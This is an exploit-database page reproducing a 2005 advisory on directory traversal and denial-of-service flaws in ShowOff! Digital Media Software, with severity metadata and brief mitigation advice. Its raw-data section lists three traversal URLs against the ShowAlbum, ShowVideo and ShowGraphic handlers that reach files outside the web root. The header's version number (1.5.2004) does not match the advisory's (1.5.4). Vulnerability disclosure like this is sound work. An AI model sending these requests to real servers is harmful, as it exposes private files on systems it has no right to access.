header-logo
Suggest Exploit
vendor:
ShowOff Digital Media Software
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal and Denial of Service
22
CWE
Product Name: ShowOff Digital Media Software
Affected Version From: 1.5.2004
Affected Version To: 1.5.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:showoff_software:showoff_digital_media_software
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

ShowOff! Digital Media Software Multiple Vulnerabilities

ShowOff! Digital Media Software is affected by multiple vulnerabilities. These issues can allow an attacker to carry out directory traversal and denial of service attacks. An attacker can exploit these issues by sending a specially crafted HTTP request containing directory traversal sequences to the vulnerable application. This will allow the attacker to access files outside of the web root directory. Additionally, an attacker can exploit these issues by sending a specially crafted HTTP request containing a large number of parameters to the vulnerable application. This will cause the application to crash.

Mitigation:

Users should ensure that the application is kept up to date with the latest version. Additionally, users should ensure that the application is not exposed to untrusted networks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13598/info

ShowOff! Digital Media Software is affected by multiple vulnerabilities. These issues can allow an attacker to carry out directory traversal and denial of service attacks.

ShowOff! Digital Media Software 1.5.4 is reportedly vulnerable. Other versions may be affected as well. 

http://www.example.com/ShowAlbum?ShowDetails&1&nocount&/../../../../../../../../../../[file]
http://www.example.com/ShowVideo?1&fullnocount&/../../../../../../../../../../[file]
http://www.example.com/ShowGraphic?/../../../../../../../../[file]

Navigation

Suggest Exploit

Services By CQR